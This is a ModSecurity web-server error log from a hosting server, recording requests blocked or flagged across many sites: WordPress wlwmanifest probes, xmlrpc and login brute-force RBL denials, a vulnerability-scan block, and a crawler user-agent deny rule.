[Tue May 26 15:45:45.668956 2026] [security2:error] [pid 733610:tid 733780] [client 35.227.91.180:53688] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0cLL_4PasUNKBsfx3AAAACg"]
[Tue May 26 15:45:45.864969 2026] [security2:error] [pid 733610:tid 733770] [client 35.227.91.180:52289] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0cLL_4PasUNKBsfx4AAAAB4"]
[Tue May 26 15:45:46.067956 2026] [security2:error] [pid 745492:tid 745631] [client 35.227.91.180:58688] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0omEQglTmoWcfxJtbwAAAIs"]
[Tue May 26 15:45:46.223103 2026] [security2:error] [pid 733610:tid 733806] [client 35.227.91.180:56067] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0sLL_4PasUNKBsfx7AAAAEI"]
[Tue May 26 15:45:46.456978 2026] [security2:error] [pid 733610:tid 733808] [client 35.227.91.180:53775] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0sLL_4PasUNKBsfx9AAAAEQ"]
[Tue May 26 15:45:46.597610 2026] [security2:error] [pid 733610:tid 733759] [client 177.236.71.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy0sLL_4PasUNKBsfx6gAAABM"]
[Tue May 26 15:45:46.670380 2026] [security2:error] [pid 733610:tid 733819] [client 35.227.91.180:53882] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0sLL_4PasUNKBsfx-AAAAE8"]
[Tue May 26 15:45:47.004224 2026] [security2:error] [pid 733610:tid 733853] [client 35.227.91.180:55272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVy08LL_4PasUNKBsfyAwAAAHE"]
[Tue May 26 15:45:47.226955 2026] [security2:error] [pid 733610:tid 733840] [client 35.227.91.180:63508] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVy08LL_4PasUNKBsfyCgAAAGQ"]
[Tue May 26 15:45:47.823213 2026] [security2:error] [pid 733610:tid 733774] [client 88.151.32.54:56700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy0sLL_4PasUNKBsfx_AAAACI"]
[Tue May 26 15:45:48.170377 2026] [security2:error] [pid 733610:tid 733801] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy08LL_4PasUNKBsfyGgAAAD0"]
[Tue May 26 15:45:48.674165 2026] [security2:error] [pid 733610:tid 733794] [client 34.182.165.222:51206] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVy1MLL_4PasUNKBsfyKQAAADY"]
[Tue May 26 15:45:48.688709 2026] [security2:error] [pid 733610:tid 733702] [remote 51.79.254.190:43140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.254.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVy1MLL_4PasUNKBsfyIwAAEls"]
[Tue May 26 15:45:48.800420 2026] [security2:error] [pid 733610:tid 733862] [client 34.182.165.222:51206] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVy1MLL_4PasUNKBsfyLAAAAHo"]
[Tue May 26 15:45:49.103619 2026] [security2:error] [pid 733610:tid 733808] [client 34.182.165.222:51206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.165.182.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moneyapp.com.co"] [uri "/xmlrpc.php"] [unique_id "ahVy1MLL_4PasUNKBsfyLQAAAEQ"]
[Tue May 26 15:45:49.129746 2026] [security2:error] [pid 733610:tid 733760] [client 43.172.194.177:42248] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVy0cLL_4PasUNKBsfx2gAAABQ"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/5e4dc8beb0ebbd02-5e4dc8beb0ebbd02-combined.css
[Tue May 26 15:45:49.559698 2026] [security2:error] [pid 745492:tid 745679] [client 34.182.165.222:61230] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVy1YmEQglTmoWcfxJtiAAAALs"]
[Tue May 26 15:45:49.897047 2026] [security2:error] [pid 733610:tid 733790] [client 34.182.165.222:59551] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVy1cLL_4PasUNKBsfyOQAAADI"]
[Tue May 26 15:45:50.205116 2026] [security2:error] [pid 733610:tid 733804] [client 143.110.243.118:47980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wxo.php"] [unique_id "ahVy1sLL_4PasUNKBsfyPwAAAEA"]
[Tue May 26 15:45:50.266262 2026] [security2:error] [pid 733610:tid 733779] [client 34.182.165.222:53298] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVy1sLL_4PasUNKBsfyQgAAACc"]
[Tue May 26 15:45:50.279291 2026] [security2:error] [pid 745492:tid 745709] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy1YmEQglTmoWcfxJtjQAAANk"]
[Tue May 26 15:45:50.745219 2026] [security2:error] [pid 733610:tid 733749] [client 34.182.165.222:60397] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVy1sLL_4PasUNKBsfySAAAAAk"]
[Tue May 26 15:45:51.094792 2026] [security2:error] [pid 745492:tid 745676] [client 34.182.165.222:54514] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVy14mEQglTmoWcfxJtngAAALg"]
[Tue May 26 15:45:51.426098 2026] [security2:error] [pid 733610:tid 733852] [client 34.182.165.222:49546] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVy18LL_4PasUNKBsfyVAAAAHA"]
[Tue May 26 15:45:51.755470 2026] [security2:error] [pid 733610:tid 733803] [client 34.182.165.222:58370] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVy18LL_4PasUNKBsfyWgAAAD8"]
[Tue May 26 15:45:51.941831 2026] [security2:error] [pid 745492:tid 745693] [client 43.172.196.186:60224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVy1omEQglTmoWcfxJtmQAAAMk"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/5e4dc8beb0ebbd02-5e4dc8beb0ebbd02-combined.css
[Tue May 26 15:45:52.024693 2026] [security2:error] [pid 733610:tid 733802] [client 34.182.165.222:56916] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVy2MLL_4PasUNKBsfyYgAAAD4"]
[Tue May 26 15:45:52.414081 2026] [security2:error] [pid 733610:tid 733766] [client 43.172.198.65:46730] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVy18LL_4PasUNKBsfyTwAAABo"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/5e4dc8beb0ebbd02-5e4dc8beb0ebbd02-combined.css
[Tue May 26 15:45:52.433712 2026] [security2:error] [pid 733610:tid 733864] [client 34.182.165.222:57773] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVy2MLL_4PasUNKBsfyawAAAHw"]
[Tue May 26 15:45:52.658416 2026] [security2:error] [pid 745492:tid 745744] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy2ImEQglTmoWcfxJtpQAAAPw"]
[Tue May 26 15:45:52.791732 2026] [security2:error] [pid 745492:tid 745745] [client 34.182.165.222:56136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVy2ImEQglTmoWcfxJtswAAAP0"]
[Tue May 26 15:45:53.126658 2026] [security2:error] [pid 745492:tid 745647] [client 34.182.165.222:50619] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "moneyapp.com.co"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVy2YmEQglTmoWcfxJtuAAAAJs"]
[Tue May 26 15:45:53.272012 2026] [security2:error] [pid 733610:tid 733804] [client 103.153.130.62:58993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy2cLL_4PasUNKBsfydAAAAEA"]
[Tue May 26 15:45:53.272264 2026] [security2:error] [pid 733610:tid 733804] [client 103.153.130.62:58993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy2cLL_4PasUNKBsfydAAAAEA"]
[Tue May 26 15:45:54.581573 2026] [security2:error] [pid 745492:tid 745694] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy2omEQglTmoWcfxJt0wAAAMo"]
[Tue May 26 15:45:55.151176 2026] [security2:error] [pid 745492:tid 745675] [client 43.173.179.161:37404] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVy2YmEQglTmoWcfxJtygAAALc"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/5e4dc8beb0ebbd02-5e4dc8beb0ebbd02-combined.css
[Tue May 26 15:45:55.525638 2026] [security2:error] [pid 745492:tid 745752] [client 43.172.196.62:39188] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVy2omEQglTmoWcfxJt1AAAAQQ"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/5e4dc8beb0ebbd02-5e4dc8beb0ebbd02-combined.css
[Tue May 26 15:45:56.460205 2026] [security2:error] [pid 745492:tid 745650] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy3ImEQglTmoWcfxJuEgAAAJ4"]
[Tue May 26 15:45:57.264419 2026] [security2:error] [pid 745492:tid 745586] [remote 94.76.235.103:41532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVy3YmEQglTmoWcfxJuNwAA-Vo"]
[Tue May 26 15:45:57.917592 2026] [security2:error] [pid 745492:tid 745745] [client 43.173.181.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVy3ImEQglTmoWcfxJuMAAAAP0"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/5e4dc8beb0ebbd02-5e4dc8beb0ebbd02-combined.css
[Tue May 26 15:45:58.185644 2026] [security2:error] [pid 745492:tid 745713] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy3YmEQglTmoWcfxJuTgAAAN0"]
[Tue May 26 15:45:58.579392 2026] [security2:error] [pid 745492:tid 745671] [client 43.172.197.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVy3YmEQglTmoWcfxJuQgAAALM"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/5e4dc8beb0ebbd02-5e4dc8beb0ebbd02-combined.css
[Tue May 26 15:46:00.719310 2026] [security2:error] [pid 745492:tid 745713] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy4ImEQglTmoWcfxJulAAAAN0"]
[Tue May 26 15:46:01.227109 2026] [security2:error] [pid 745492:tid 745697] [client 88.151.32.54:56702] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy4ImEQglTmoWcfxJukQAAAM0"]
[Tue May 26 15:46:03.043762 2026] [security2:error] [pid 745492:tid 745729] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy4omEQglTmoWcfxJu1gAAAO0"]
[Tue May 26 15:46:03.467247 2026] [security2:error] [pid 745492:tid 745702] [client 185.191.171.7:26856] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/list/"] [unique_id "ahVy44mEQglTmoWcfxJu4wAAANI"]
[Tue May 26 15:46:03.467447 2026] [security2:error] [pid 745492:tid 745702] [client 185.191.171.7:26856] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/list/"] [unique_id "ahVy44mEQglTmoWcfxJu4wAAANI"]
[Tue May 26 15:46:03.915267 2026] [security2:error] [pid 745492:tid 745673] [client 103.153.130.62:54984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy44mEQglTmoWcfxJu9AAAALU"]
[Tue May 26 15:46:03.915431 2026] [security2:error] [pid 745492:tid 745673] [client 103.153.130.62:54984] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy44mEQglTmoWcfxJu9AAAALU"]
[Tue May 26 15:46:04.323282 2026] [security2:error] [pid 745492:tid 745752] [client 167.160.70.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVy5ImEQglTmoWcfxJu_wAAAQQ"], referer: https://www.anujtradingco.com/
[Tue May 26 15:46:04.987934 2026] [security2:error] [pid 745492:tid 745719] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy5ImEQglTmoWcfxJvCQAAAOM"]
[Tue May 26 15:46:06.058682 2026] [security2:error] [pid 745492:tid 745666] [client 167.160.70.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVy5YmEQglTmoWcfxJvOAAAAK4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1255155&moderation-hash=8ab7e7b063c006b5ce3891a0c7cf066b
[Tue May 26 15:46:06.945667 2026] [security2:error] [pid 745492:tid 745669] [client 114.119.133.125:20629] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.thegoodsporting.com"] [uri "/accessories.php"] [unique_id "ahVy5omEQglTmoWcfxJvUgAAALE"], referer: https://www.thegoodsporting.com/
[Tue May 26 15:46:07.056122 2026] [security2:error] [pid 745492:tid 745719] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy5omEQglTmoWcfxJvTQAAAOM"]
[Tue May 26 15:46:09.118615 2026] [security2:error] [pid 745492:tid 745709] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy6ImEQglTmoWcfxJvgwAAANk"]
[Tue May 26 15:46:09.826580 2026] [security2:error] [pid 745492:tid 745704] [client 167.160.70.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVy6YmEQglTmoWcfxJvnwAAANQ"], referer: https://anujtradingco.com
[Tue May 26 15:46:10.057863 2026] [security2:error] [pid 745492:tid 745741] [client 104.23.223.44:12023] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blettclms.com"] [uri "/wp-admin/install.php"] [unique_id "ahVy6YmEQglTmoWcfxJvoAAAAPk"]
[Tue May 26 15:46:10.135594 2026] [security2:error] [pid 745492:tid 745724] [client 88.151.32.54:56704] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy6ImEQglTmoWcfxJvjQAAAOg"]
[Tue May 26 15:46:10.622677 2026] [security2:error] [pid 745492:tid 745708] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy6omEQglTmoWcfxJvrwAAANg"]
[Tue May 26 15:46:11.117764 2026] [security2:error] [pid 745492:tid 745629] [client 104.23.223.44:12633] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/wp-admin/install.php"] [unique_id "ahVy6omEQglTmoWcfxJvuQAAiSA"]
[Tue May 26 15:46:12.793651 2026] [security2:error] [pid 745492:tid 745670] [client 23.240.65.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy7ImEQglTmoWcfxJv3wAAALI"]
[Tue May 26 15:46:13.851481 2026] [security2:error] [pid 745492:tid 745744] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy7YmEQglTmoWcfxJv-QAAAPw"]
[Tue May 26 15:46:14.198136 2026] [security2:error] [pid 745492:tid 745749] [client 103.153.130.62:55302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy7omEQglTmoWcfxJwCQAAAQE"]
